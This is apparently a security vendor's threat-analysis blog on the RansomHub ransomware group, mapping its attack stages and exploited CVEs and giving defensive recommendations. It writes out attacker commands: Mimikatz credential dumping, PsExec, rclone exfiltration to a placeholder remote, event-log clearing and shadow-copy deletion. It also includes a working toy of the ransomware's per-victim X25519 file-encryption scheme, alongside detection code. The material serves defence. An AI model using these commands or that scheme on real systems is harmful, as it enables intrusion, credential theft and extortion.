RansomHub, a ransomware-as-a-service variant formerly known as Cyclops and Knight, has become one of the most pervasive threats to critical sectors—from water and wastewater systems to healthcare and transportation. Leveraging a double-extortion model, RansomHub encrypts systems and exfiltrates data while demanding ransoms from victims.
This blog breaks down the group’s tactics, techniques, and procedures (TTPs) across the entire attack chain. This analysis also highlights critical vulnerabilities and provides actionable mitigation recommendations.
Infection Chain Overview of RansomHub Attacks
RansomHub’s attack chain follows a structured progression:
- Initial Access: The group gains entry via spear-phishing, exploitation of internet-facing vulnerabilities, and password spraying.
- Execution & Defense Evasion: Once inside, affiliates deploy malicious scripts to disable security tools, clear logs, and disguise the ransomware binary.
- Persistence & Privilege Escalation: Creation and reactivation of user accounts, coupled with the use of tools such as Mimikatz, help maintain access and elevate privileges.
- Discovery & Lateral Movement: Network scanners and legitimate remote access tools (e.g., AnyDesk, PsExec) are repurposed to map out systems and move laterally.
- Credential Access: Dumping credentials (e.g., from LSASS memory) provides the means for deeper network compromise.
- Exfiltration: Data is selectively exfiltrated using tools such as Rclone and cloud transfer services, typically over channels separate from the C2 channel (unencrypted or asymmetrically encrypted).
- Impact: The final stage encrypts files with Curve25519-based elliptic-curve cryptography and deletes Volume Shadow Copies to thwart recovery.
Analyzing RansomHub Ransomware’s Advanced Tactics, Techniques, and Procedures (TTPs)
TA0001: Initial Access Methods
Phishing: Spearphishing Link [T1566.002]
RansomHub affiliates send crafted phishing emails that lure victims into clicking malicious links or opening weaponized attachments, which then deliver malware or exploit known CVEs to gain a foothold in the organization's IT environment. The CVEs the affiliates have been observed exploiting are listed under T1190 below.
Exploit Public-Facing Application [T1190]
Below is a list of CVEs that RansomHub affiliates have been observed exploiting for initial access. Notably, public exploits for most of them are available on platforms such as GitHub or Exploit-DB, indicating that the affiliates prioritized convenience over developing their own exploits.
- CVE-2023-3519: An unauthenticated stack-based buffer overflow in the NSPPE process of Citrix ADC/Gateway (NetScaler) that allows remote code execution as root via a crafted HTTP request. A public PoC exists.
- CVE-2023-27997: A heap-based buffer overflow in the SSL-VPN component of multiple FortiOS and FortiProxy versions that enables pre-authentication remote code execution through specially crafted requests. A public PoC exists.
- CVE-2023-46604: A deserialization flaw in the Java OpenWire protocol marshaller used by Apache ActiveMQ that lets a remote attacker execute arbitrary shell commands by manipulating serialized class types. A public PoC exists.
- CVE-2023-22515: A broken access control flaw in publicly accessible Confluence Data Center and Server instances that allows the unauthenticated creation of administrator accounts, leading to full application access. A public PoC exists.
- CVE-2023-46747: An authentication bypass in the BIG-IP Configuration utility that allows an attacker with network access to it to execute arbitrary system commands via undisclosed crafted requests (software versions that have reached End of Technical Support, EoTS, were not evaluated). A public PoC exists.
- CVE-2023-48788: A SQL injection in Fortinet FortiClientEMS that can be exploited via specially crafted requests to execute unauthorized code or commands. A public PoC exists.
- CVE-2017-0144: The SMBv1 vulnerability exploited by EternalBlue, allowing remote code execution on unpatched Windows systems via crafted packets. It is old and widely known, and public exploits are abundant.
- CVE-2020-1472 (Zerologon), one of the most prominently observed CVEs exploited by RansomHub: a critical elevation-of-privilege flaw in the Netlogon Remote Protocol. Netlogon's AES-CFB8 credential computation used a fixed all-zero IV, so an unauthenticated attacker can pass the client credential check by retrying with an all-zero challenge and credential (roughly one attempt in 256 succeeds), establish a Netlogon secure channel to a domain controller, and reset the DC's machine account password to take over the domain. A public exploit exists.
- CVE-2020-0787: An elevation-of-privilege vulnerability in the Windows Background Intelligent Transfer Service (BITS), caused by improper handling of symbolic links, which has potentially been chained with Zerologon for further privilege escalation.
These vulnerabilities are leveraged during initial access to compromise internet-facing systems; phishing and password spraying round out the group's entry methods.
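To make the Zerologon flaw concrete, the following is an added example written for this post (not RansomHub code, not an exploit, and not any vendor's tooling). It implements the CFB8 mode that Netlogon's credential computation uses, but over a toy block function (SHA-256 truncated to 16 bytes) that stands in for AES-128 so it runs without extra libraries; it is not AES and is for demonstration only. The function names (toy_block_cipher, cfb8_encrypt, zero_credential_accepted, simulate_attack) and the constructed session-key derivation are assumptions of the example.

```python
import hashlib

BLOCK = 16  # AES block size; Netlogon uses AES-128 in CFB8 mode

def toy_block_cipher(key: bytes, block: bytes) -> bytes:
    """Stand-in for AES-128 (SHA-256 of key||block, truncated). Any fixed 16-byte
    pseudo-random function shows the CFB8 mechanics; this is NOT AES."""
    assert len(key) == BLOCK and len(block) == BLOCK
    return hashlib.sha256(key + block).digest()[:BLOCK]

def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8: each output byte = plaintext byte XOR first byte of E_k(shift register);
    the register then drops its oldest byte and appends the new ciphertext byte."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = p ^ toy_block_cipher(key, bytes(register))[0]
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)

ZERO_IV = bytes(BLOCK)      # the vulnerable Netlogon code used a fixed all-zero IV
ZERO_CHALLENGE = bytes(8)   # client challenge and credential are 8 bytes each

def zero_credential_accepted(session_key: bytes) -> bool:
    """The server accepts the client credential 00..00 iff its own computation over
    the all-zero challenge also yields 00..00."""
    return cfb8_encrypt(session_key, ZERO_IV, ZERO_CHALLENGE) == ZERO_CHALLENGE

def first_keystream_byte_is_zero(session_key: bytes) -> bool:
    """Equivalent condition: with IV=0 and plaintext=0 the first ciphertext byte is
    E_k(0)[0]; if that byte is 0 the register never changes and every byte stays 0."""
    return toy_block_cipher(session_key, ZERO_IV)[0] == 0

def derive_session_key(seed: bytes, i: int) -> bytes:
    """Deterministic stand-in for the per-attempt session key the attacker never
    learns (the real key depends on a fresh server challenge each attempt)."""
    return hashlib.sha256(seed + i.to_bytes(4, "big")).digest()[:BLOCK]

def simulate_attack(trials: int, seed: bytes = b"constructed-seed") -> int:
    """Model `trials` authentication attempts against fresh session keys and return
    how many the all-zero credential passed; the expected rate is about 1/256."""
    return sum(zero_credential_accepted(derive_session_key(seed, i)) for i in range(trials))
```

Because the IV and the attacker-chosen challenge are both all zeros, only the first keystream byte matters: when E_k(0)[0] is 0, the shift register stays all zeros and every output byte is 0, so an all-zero credential is accepted about once in 256 attempts whatever the session key is. Microsoft's fix enforces secure (signed and sealed) Netlogon RPC channels, so the unsigned session the attack relies on is rejected.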
How Do We Help?
The Picus Threat Library includes exploitation attacks for both known and emerging vulnerabilities using publicly available PoCs. In fact, if there is a zero-day vulnerability attack or a CISA alert regarding the exploitation of a particular CVE, and if a publicly available PoC exists, our red team engineers add the attack to the threat library within 24 hours as per our SLA.
Brute Force: Password Spraying [T1110.003]
In some cases, RansomHub affiliates have been observed reusing valid account names exposed in previous breaches and targeting them with password spraying: a few common or previously leaked passwords tried against many accounts at low volume, which stays under lockout thresholds while still yielding a high success rate.
Password spraying, a sub-technique of Brute Force, is one of the most convenient ways for adversaries to gain a foothold in an organizational environment. It is therefore essential to rotate all valid account credentials after a known breach or incident, and to enforce policies that prevent employees from reusing the same credentials across different platforms, especially organizational ones.
TA0007: Discovery
Remote System Discovery [T1018]
RansomHub operators have been observed utilizing tools such as AngryIPScanner and Nmap to systematically scan and enumerate systems based on IP addresses or hostnames. These tools enable attackers to map the network infrastructure, identify active devices, and pinpoint potential targets for further exploitation.
Procedure Example:
```
# example nmap scan looking for Zerologon candidates: domain controllers expose
# Kerberos (88), RPC (135), LDAP (389) and SMB (445); the vulnerability check itself
# is then run with a dedicated Zerologon scanner
nmap -p 88,135,389,445 --open 10.0.0.0/24

# Angry IP Scanner or nmap: scan an IP range for the ports from 1 to 1023
# (nmap syntax shown; Angry IP Scanner takes the same range and port list)
nmap -p 1-1023 10.0.0.1-254
```
Extensive network scanning enables attackers to build a map of the compromised environment, setting the stage for lateral movement.
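As an added example (not part of the original post, and not a Picus or RansomHub artifact), here is the kind of detection a defender would run over firewall logs to catch the sweep described above: a per-source sliding window that alerts when one host touches many distinct host:port pairs in a short time. The log format, addresses and the 20-targets-in-60-seconds threshold are constructed for the example, and parse_line, detect_scanners and constructed_log are names chosen here.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed firewall log format (not a real product format):
# <ISO timestamp> src=<ip> dst=<ip> dport=<port> action=<ALLOW|DROP>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
    r"dport=(?P<dport>\d+) action=(?P<action>\w+)$"
)

def parse_line(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"],
            "target": (m["dst"], int(m["dport"]))}

def detect_scanners(lines, window_seconds=60, threshold=20):
    """Return {src: details} for sources that touched >= threshold distinct
    (dst, port) pairs inside any sliding window. Lines must be time-ordered."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # src -> deque of (ts, target) inside the window
    alerts = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent[ev["src"]]
        q.append((ev["ts"], ev["target"]))
        while q and ev["ts"] - q[0][0] > window:   # expire old entries
            q.popleft()
        distinct = {t for _, t in q}
        if len(distinct) >= threshold and ev["src"] not in alerts:
            alerts[ev["src"]] = {
                "first_seen": q[0][0].isoformat(),
                "alert_at": ev["ts"].isoformat(),
                "distinct_targets": len(distinct),
                "ports": sorted({p for _, p in distinct}),
            }
    return alerts

def constructed_log():
    """Build a time-ordered sample log: one fast scanner, one slow enumerator that
    stays under the per-window threshold, and normal client traffic (all made up)."""
    base = datetime(2024, 6, 1, 10, 0, 0)
    rows = []
    # 10.0.0.5 sweeps 10.0.1.1-30 on 445 within 30 seconds (Angry IP Scanner / nmap style)
    for i in range(30):
        rows.append((base + timedelta(seconds=i), "10.0.0.5", f"10.0.1.{i + 1}", 445, "DROP"))
    # 10.0.0.9 probes 25 hosts but only one every 10 s, so any 60 s window holds at most 7
    for i in range(25):
        rows.append((base + timedelta(seconds=10 * i), "10.0.0.9", f"10.0.2.{i + 1}", 22, "DROP"))
    # 10.0.0.7 behaves normally: a file server, a DC and a web proxy
    for i, (dst, port) in enumerate([("10.0.1.10", 445), ("10.0.1.1", 88), ("10.0.1.20", 8080)]):
        rows.append((base + timedelta(seconds=5 * i), "10.0.0.7", dst, port, "ALLOW"))
    rows.sort()
    return [f"{t.isoformat()} src={s} dst={d} dport={p} action={a}" for t, s, d, p, a in rows]
```

The window matters as much as the threshold: the slow enumerator is invisible at 60 seconds but shows up once the window is widened, which is the trade-off to tune against the normal fan-out of your own monitoring and backup hosts.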
How Do We Help?
One of the threats added to the Picus Threat Library for RansomHub—as part of the Picus Security Control Validation product—involves testing the ingress tool transfer of AngryIPScanner to the system.
Network Service Discovery [T1046]
In addition, RansomHub was observed leveraging PowerShell-based “living off the land” methods to help identify running services and network configurations.
TA0005: Defense Evasion
Disabling Security Tools [T1562.001] & Indicator Removal [T1070]
RansomHub affiliates leverage WMI and various other techniques to disable endpoint detection and response (EDR) tools and antivirus solutions.
Below is a list of batch files and tools executed by RansomHub to evade detection, erase log files, and eliminate forensic artifacts, making analysis and incident response significantly more challenging.
232.bat:
- Uses a brute-force password spraying technique and disables Windows Defender's real-time monitoring.
tdsskiller.bat:
- Modifies the Windows Registry to set explorer.exe as the default shell for users logging into the system.
- Uses taskkill with filters and wildcards to forcibly terminate specified processes.
- Runs "C:\Windows\tdsskiller.exe" (Kaspersky's TDSSKiller rootkit removal tool) with the parameters -dcsvc "TMBMServer" -accepteula to disable the TMBMServer service (Trend Micro Unauthorized Change Prevention Service), accepting the EULA automatically to avoid prompts.
killdeff.bat:
- Contains an obfuscated PowerShell script designed to toggle Windows Defender settings for malicious purposes.
- The script manipulates registry entries, alters Windows Defender and notification settings, and attempts privilege escalation by abusing low-level interactions to bypass UAC.
LogDel.bat:
- Alters file attributes with a command such as attrib Default.rdp -s -h, removing the system and hidden attributes from Default.rdp so the RDP connection file can be tampered with.
- Modifies the Windows Registry key HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers, which stores the RDP client's connection history, to facilitate unauthorized remote access.
- Clears Windows Event Logs using wevtutil.exe (e.g., wevtutil.exe cl "Application"), erasing traces of malicious activity and hindering forensic investigations.
EDRKillShifter:
- Functions as a loader that drops a legitimate but vulnerable driver and abuses it to disable antivirus and EDR solutions, a technique known as "bring your own vulnerable driver" (BYOVD).
- Its execution involves three main steps:
- First, it is executed with a command-line argument that includes a password.
- Second, when the password is correct, it decrypts an embedded resource (data.bin) and runs it in memory.
- Third, the second-stage payload decrypts and executes the final payload, which drops the vulnerable driver and uses it to terminate EDR processes.
- Additionally, EDRKillShifter creates a Windows service (svc.exe), which further aids in disabling the targeted security applications.
Each of these techniques plays a critical role in evading detection and maintaining persistence within the target environment.
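The batch files above are recognizable from a handful of command patterns. The following added example (written for this post; not RansomHub code and not a Picus module) scans a script for those patterns and tags each hit with the ATT&CK technique it corresponds to. The sample script is constructed to resemble the behaviours described above rather than being a real artifact, and the RULES table, classify_script and summarize are assumptions of the example.

```python
import re

# Assumed mapping of command patterns to ATT&CK techniques, derived from the
# batch-file behaviours described above (not an official or vendor rule set).
RULES = [
    ("T1562.001", "Windows Defender real-time monitoring disabled",
     re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$?true", re.I)),
    ("T1562.001", "TDSSKiller abused to remove a security service",
     re.compile(r"tdsskiller\.exe.*-dcsvc", re.I)),
    ("T1562.001", "Forced process termination with filter or wildcard",
     re.compile(r"\btaskkill\b.*(/f\b|/fi\b|\*)", re.I)),
    ("T1070.001", "Windows event log cleared",
     re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I)),
    ("T1070", "Default.rdp attributes changed (RDP artifact tampering)",
     re.compile(r"\battrib\b.*Default\.rdp", re.I)),
    ("T1112", "RDP client history key modified",
     re.compile(r"\breg(\.exe)?\s+(add|delete)\b.*Terminal Server Client\\Servers", re.I)),
    ("T1112", "Winlogon shell replaced",
     re.compile(r"\breg(\.exe)?\s+add\b.*Winlogon.*/v\s+Shell\b", re.I)),
    ("T1490", "Volume shadow copies deleted",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic\s+shadowcopy\s+delete", re.I)),
    ("T1490", "Windows recovery environment disabled",
     re.compile(r"\bbcdedit\b.*recoveryenabled\s+no\b", re.I)),
]

def classify_script(text):
    """Return (line_no, technique_id, description) for every rule a line matches."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.lower().startswith(("rem ", "::")):
            continue  # skip blank lines and batch comments
        for tid, desc, pattern in RULES:
            if pattern.search(line):
                findings.append((n, tid, desc))
    return findings

def summarize(findings):
    """Distinct technique IDs, sorted, for a one-line triage summary."""
    return sorted({tid for _, tid, _ in findings})

# Constructed sample that mirrors the behaviours described above; not a real RansomHub file.
CONSTRUCTED_SCRIPT = r"""@echo off
rem constructed sample for the example, not a real artifact
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d explorer.exe /f
taskkill /f /t /fi "IMAGENAME eq Tm*"
C:\Windows\tdsskiller.exe -dcsvc "TMBMServer" -accepteula
attrib Default.rdp -s -h
reg delete "HKCU\Software\Microsoft\Terminal Server Client\Servers" /f
wevtutil.exe cl "Application"
wevtutil.exe cl "Security"
vssadmin delete shadows /all /quiet
bcdedit /set {default} recoveryenabled No
echo done
"""
```

Running classify_script over CONSTRUCTED_SCRIPT tags lines 3 through 12 and summarizes to T1070, T1070.001, T1112, T1490 and T1562.001. The same rules applied to process-creation telemetry (command lines from Sysmon event 1 or Security event 4688) catch these commands even when the batch file itself is deleted afterwards.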
How Do We Help?
A threat added to the Picus Threat Library for RansomHub—as part of the Picus Security Control Validation product—involves testing information gathering on antivirus programs using tools such as WMIC, as well as clearing all event logs to severely impair forensic analysis.
TA0003: Persistence
Account Creation [T1136]
After initial compromise, RansomHub affiliates create new user accounts or reactivate disabled accounts to ensure ongoing access.
Scheduled Tasks & Scripts [T1053.005]
Persistence is often maintained via scheduled tasks that re-execute malicious payloads at system startup.
TA0004: Privilege Escalation & Credential Access
Account Manipulation [T1098]
Changing account permissions or re-enabling accounts allows attackers to gain administrative privileges.
How Do We Help?
A threat added to the Picus Threat Library for RansomHub, as part of the Picus Security Control Validation product, involves discovering disabled user accounts and creating new ones.
OS Credential Dumping: LSASS Memory [T1003.001]
RansomHub uses tools such as Mimikatz to dump LSASS memory and harvest credentials.
Procedure Example:
An attacker may run the following Mimikatz commands to extract credentials:
```
privilege::debug
sekurlsa::logonpasswords
```
privilege::debug requests SeDebugPrivilege so that Mimikatz can open a handle to LSASS; sekurlsa::logonpasswords then reads the logon sessions and returns NTLM hashes, Kerberos tickets and, where the WDigest provider still caches them, clear-text passwords. The ability to dump credentials can lead to widespread lateral movement across the network, magnifying the impact of the breach.
How Do We Help?
One of the threats added to the Picus Threat Library for RansomHub, as part of the Picus Security Control Validation product, involves using Mimikatz to dump LSASS memory (credential dumping), with the harvested credentials then used for lateral movement or privilege escalation.
TA0008: Lateral Movement
Exploitation of Remote Services [T1210]
Using vulnerabilities in remote services, RansomHub operators gain access to internal systems.
Remote Desktop Protocol (RDP) [T1021.001] & Tools like PsExec [S0029]
Legitimate remote access tools are repurposed for malicious lateral movement.
How Do We Help?
One of the threats added to the Picus Threat Library for RansomHub—as part of the Picus Security Control Validation product—involves testing the execution of PsExec.
Use of AnyDesk [T1219]
Even legitimate remote control software can be abused to maintain command and control (C2). In some cases, RansomHub has been observed using AnyDesk to execute commands on victim hosts remotely.
Procedure Example:
An affiliate might use PsExec to remotely execute commands on a target machine:
```
psexec \\<target-IP> -u <username> -p <password> cmd.exe
```
Lateral movement using trusted tools makes it difficult for defenders to distinguish between normal administrative activity and malicious actions.
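The persistence, credential access and lateral movement steps above each leave a Windows event that can be correlated. As an added example (not the original post's content, not RansomHub tooling, and not a Picus test), the following pairs Security event 4720 (account created) with 4732 (member added to Administrators), flags 4722 (disabled account enabled), Sysmon event 10 handles on lsass.exe with the access masks credential dumpers request, System event 7045 for the PSEXESVC service that PsExec installs, and 1102 (audit log cleared). The normalized event dicts, the process allowlist and the function names are constructed for the example.

```python
from datetime import datetime, timedelta

# Sysmon event 10 GrantedAccess values commonly seen when LSASS memory is read
SUSPICIOUS_LSASS_ACCESS = {0x1010, 0x1410, 0x1FFFFF}
# Assumed allowlist of system binaries that legitimately open LSASS; tune per environment
LSASS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

def correlate(events, admin_window_minutes=10):
    """Walk normalized events in time order and emit (rule, detail) alerts."""
    admin_window = timedelta(minutes=admin_window_minutes)
    alerts = []
    created = {}  # username -> time of the 4720 that created it
    for ev in sorted(events, key=lambda e: e["time"]):
        eid, t = ev["id"], ev["time"]
        if eid == 4720:                   # A user account was created
            created[ev["target_user"].lower()] = t
        elif eid == 4732:                 # A member was added to a security-enabled local group
            member = ev["member"].lower()
            if (ev["group"].lower() == "administrators" and member in created
                    and t - created[member] <= admin_window):
                alerts.append(("new-account-added-to-admins", member))
        elif eid == 4722:                 # A user account was enabled
            alerts.append(("disabled-account-enabled", ev["target_user"].lower()))
        elif eid == 10:                   # Sysmon ProcessAccess
            src = ev["source_image"].lower()
            access = int(ev["granted_access"], 16)
            if (ev["target_image"].lower().endswith(r"\lsass.exe")
                    and access in SUSPICIOUS_LSASS_ACCESS and src not in LSASS_ALLOWLIST):
                alerts.append(("lsass-memory-access", f"{src} access={hex(access)}"))
        elif eid == 7045:                 # A service was installed in the system
            if ev["service"].upper() == "PSEXESVC":
                alerts.append(("psexec-service-installed", ev["service"]))
        elif eid == 1102:                 # The audit log was cleared
            alerts.append(("audit-log-cleared", ev["subject_user"]))
    return alerts

def constructed_events():
    """Hand-built, already-normalized events for the example (not real telemetry)."""
    b = datetime(2024, 6, 1, 10, 0, 0)
    return [
        {"id": 4720, "time": b, "target_user": "svc_backup2"},
        {"id": 4732, "time": b + timedelta(minutes=3), "group": "Administrators", "member": "svc_backup2"},
        {"id": 4722, "time": b + timedelta(minutes=5), "target_user": "helpdesk_old"},
        {"id": 10, "time": b + timedelta(minutes=20),
         "source_image": r"C:\Users\bob\AppData\Local\Temp\m.exe",
         "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
        {"id": 10, "time": b + timedelta(minutes=21),        # allowlisted: no alert
         "source_image": r"C:\Windows\System32\svchost.exe",
         "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1410"},
        {"id": 7045, "time": b + timedelta(minutes=30), "service": "PSEXESVC"},
        {"id": 1102, "time": b + timedelta(minutes=45), "subject_user": "bob"},
        # created and promoted an hour apart: outside the default window, so not paired
        {"id": 4720, "time": b + timedelta(hours=2), "target_user": "tempadmin"},
        {"id": 4732, "time": b + timedelta(hours=3), "group": "Administrators", "member": "tempadmin"},
    ]
```

Each rule on its own is noisy in a large estate (administrators do create accounts and PsExec is a legitimate tool); the value is in seeing several of them from one host or one account inside the same hour, which is the shape of the RansomHub chain described in this post.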
How Do We Help?
One of the threats added to the Picus Threat Library for RansomHub, as part of the Picus Security Control Validation product, involves testing the download of the AnyDesk portable version.
TA0010: Data Exfiltration
Exfiltration Over Alternative Protocol [T1048.002, T1048.003]
Data is often exfiltrated over channels separate from the C2 channel that are either unencrypted (T1048.003) or asymmetrically encrypted (T1048.002).
Transfer Data to Cloud Account [T1537]
Affiliates may leverage cloud storage services to transfer sensitive data out of the environment.
Procedure Example:
A command using Rclone might be structured as follows to exfiltrate files:
```
rclone copy \\<compromised-IP>\share <remote-cloud>:/backup --include "*.pdf" --include "*.docx" --max-age <date>
```
The use of common file transfer tools for data exfiltration complicates detection efforts, as network traffic may appear benign.
TA0040: Impact – Encryption and System Disruption
File Encryption Using Curve25519 [T1486]
RansomHub employs Curve25519 elliptic-curve cryptography with a public/private key pair unique to each victim organization. Files are encrypted in intermittent chunks rather than end to end, which speeds up the encryption run, and metadata including the public encryption key and a checksum is appended to each file to support decryption if a ransom is paid.
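To show how the per-victim Curve25519 key pair, a per-file key, intermittent encryption and the appended metadata fit together, here is an added example written for this post; it is not RansomHub's code and does not reproduce its file format. X25519 is implemented from RFC 7748 in pure Python so it runs offline; the symmetric layer is a toy SHA-256 counter-mode keystream standing in for a real stream cipher, the 1 KiB-of-every-4 KiB chunk pattern and the footer layout (magic, ephemeral public key, length, truncated SHA-256 checksum) are assumptions, and all function names are chosen here.

```python
import hashlib
import os
import struct

# --- X25519 (RFC 7748) in pure Python: slow, but enough to show the key exchange ---
P = 2**255 - 19
A24 = 121665
BASEPOINT = b"\x09" + b"\x00" * 31

def _decode_scalar(k: bytes) -> int:
    k = bytearray(k)
    k[0] &= 248
    k[31] &= 127
    k[31] |= 64
    return int.from_bytes(k, "little")

def x25519(k: bytes, u: bytes) -> bytes:
    """Montgomery ladder: returns k * u as a 32-byte little-endian u-coordinate."""
    n = _decode_scalar(k)
    x1 = int.from_bytes(u[:31] + bytes([u[31] & 127]), "little") % P
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (n >> t) & 1
        swap ^= kt
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = (da + cb) ** 2 % P
        z3 = x1 * ((da - cb) ** 2) % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    if swap:
        x2, z2 = x3, z3
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")

def keypair(priv=None):
    """(private, public); the victim's pair is generated once per organization."""
    priv = priv or os.urandom(32)
    return priv, x25519(priv, BASEPOINT)

# --- Symmetric layer: toy SHA-256 counter-mode keystream standing in for a real cipher ---
def keystream(key: bytes, nbytes: int) -> bytes:
    out = bytearray()
    ctr = 0
    while len(out) < nbytes:
        out += hashlib.sha256(key + ctr.to_bytes(8, "little")).digest()
        ctr += 1
    return bytes(out[:nbytes])

CHUNK, STRIDE = 1024, 4096      # assumed intermittent pattern: first 1 KiB of every 4 KiB
MAGIC = b"RHUBDEMO"
FOOTER_LEN = 8 + 32 + 8 + 16    # magic, ephemeral public key, plaintext length, checksum

def _xor_chunks(buf: bytearray, ks: bytes) -> None:
    """XOR only the first CHUNK bytes of every STRIDE-byte block (the rest stays plain)."""
    for off in range(0, len(buf), STRIDE):
        for i in range(off, min(off + CHUNK, len(buf))):
            buf[i] ^= ks[i]

def encrypt_file(data: bytes, victim_pub: bytes, eph_priv=None) -> bytes:
    """Per-file ephemeral X25519 key, ECDH with the victim's public key, hashed to a file key."""
    eph_priv, eph_pub = keypair(eph_priv)
    file_key = hashlib.sha256(x25519(eph_priv, victim_pub)).digest()
    buf = bytearray(data)
    _xor_chunks(buf, keystream(file_key, len(data)))
    footer = MAGIC + eph_pub + struct.pack("<Q", len(data)) + hashlib.sha256(data).digest()[:16]
    return bytes(buf) + footer

def decrypt_file(blob: bytes, victim_priv: bytes) -> bytes:
    """Only the holder of the victim's private key (the operator) can recompute file_key."""
    body, footer = blob[:-FOOTER_LEN], blob[-FOOTER_LEN:]
    if footer[:8] != MAGIC:
        raise ValueError("no footer: not encrypted by this scheme")
    eph_pub, (length,), checksum = footer[8:40], struct.unpack("<Q", footer[40:48]), footer[48:64]
    file_key = hashlib.sha256(x25519(victim_priv, eph_pub)).digest()
    buf = bytearray(body[:length])
    _xor_chunks(buf, keystream(file_key, length))
    if hashlib.sha256(buf).digest()[:16] != checksum:
        raise ValueError("checksum mismatch: wrong private key or tampered file")
    return bytes(buf)

def can_decrypt(blob: bytes, victim_priv: bytes) -> bool:
    try:
        decrypt_file(blob, victim_priv)
        return True
    except ValueError:
        return False
```

Because the file key is derived from the ephemeral private key and the victim's public key, the encryptor never needs to contact the operator and leaves nothing recoverable on the host: the footer's ephemeral public key is useless without victim_priv, which only the operator holds. That is why recovery has to come from offline backups rather than from forensics on the encrypted machine.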
Procedure Example:
A sample ransomware note may instruct the victim to visit a unique .onion URL and provide a client ID, while the ransomware appends a new extension (e.g., “.1d7fdb”) to encrypted files.
How Do We Help?
One of the threats added to the Picus Threat Library for RansomHub, as part of the Picus Security Control Validation product, involves encrypting a dummy file with a symmetric key derived from Curve25519.
As you can see here, with Picus, you can test your EDR solutions not only against encrypting files but also against writing a ransom note!
Inhibit System Recovery [T1490]
The ransomware deletes Volume Shadow Copy Service (VSS) snapshots using commands such as:
```
net start vss
vssadmin delete shadows /all /quiet
```
Starting the VSS service first ensures vssadmin can enumerate the snapshots; deleting them removes the local restore points, so recovery options on the host are eliminated.
How Do We Help?
One of the threats added to the Picus Threat Library for RansomHub—as part of the Picus Security Control Validation product—involves deleting shadow copies by using Vssadmin.
The irreversible deletion of backups and shadow copies, coupled with strong encryption, leaves organizations with few recovery options.
How Does Picus Help Against RansomHub Ransomware Threat Group?
We strongly suggest simulating ransomware groups to test the effectiveness of your security controls against their attacks using the Picus Security Validation Platform.
Picus Threat Library includes the following threats for RansomHub Ransomware.
| Threat ID | Threat Name | Attack Module |
|---|---|---|
| 24872 | RansomHub Ransomware Campaign | Windows Endpoint |
| 72426 | RansomHub Ransomware Download Threat | Network Infiltration |
| 55745 | RansomHub Ransomware Email Threat | E-mail Infiltration |
Defense Strategies Against RansomHub Ransomware Attacks
Given the complex and evolving nature of RansomHub, organizations must implement a layered defense strategy:
Patch Management & Vulnerability Mitigation
- Immediately install updates for operating systems, software, and firmware.
- Prioritize patching known vulnerabilities (e.g., Citrix ADC, FortiOS, Netlogon).
Enhanced Endpoint Protection
- Deploy phishing-resistant MFA and enforce strong password policies.
- Use updated EDR solutions that incorporate behavioral analytics and heuristic scanning.
Network Segmentation & Monitoring
- Segment networks to restrict lateral movement.
- Use continuous network monitoring and logging to detect anomalous scanning or file transfers.
Credential Security
- Monitor for unusual LSASS activity and use privileged access management solutions to secure credentials.
- Regularly audit and review account privileges and promptly remove or disable unauthorized accounts.
Data Backup & Recovery
- Maintain offline, immutable backups of critical data and ensure they are segmented from the primary network.
- Test recovery procedures regularly to verify backup integrity.
Security Awareness & Incident Response
- Train users to recognize phishing attempts and report suspicious activity.
- Develop and regularly update an incident response plan that includes steps for isolating compromised systems and notifying appropriate authorities.
Conclusion
RansomHub represents one of the most significant ransomware threats of 2024, leveraging advanced TTPs to infiltrate networks, escalate privileges, and exfiltrate data before encrypting critical systems. The group’s reliance on publicly available exploits and stealthy defense evasion techniques makes it a formidable adversary for organizations across multiple sectors.
To effectively mitigate the risks posed by RansomHub, organizations must adopt a proactive security strategy that includes robust patch management, endpoint protection, network segmentation, and credential security. Regular security validation, such as Picus Security’s simulation capabilities, enables defenders to test and enhance their security controls against emerging ransomware tactics. By staying vigilant and continuously strengthening defenses, organizations can reduce their exposure to ransomware attacks and safeguard their critical assets.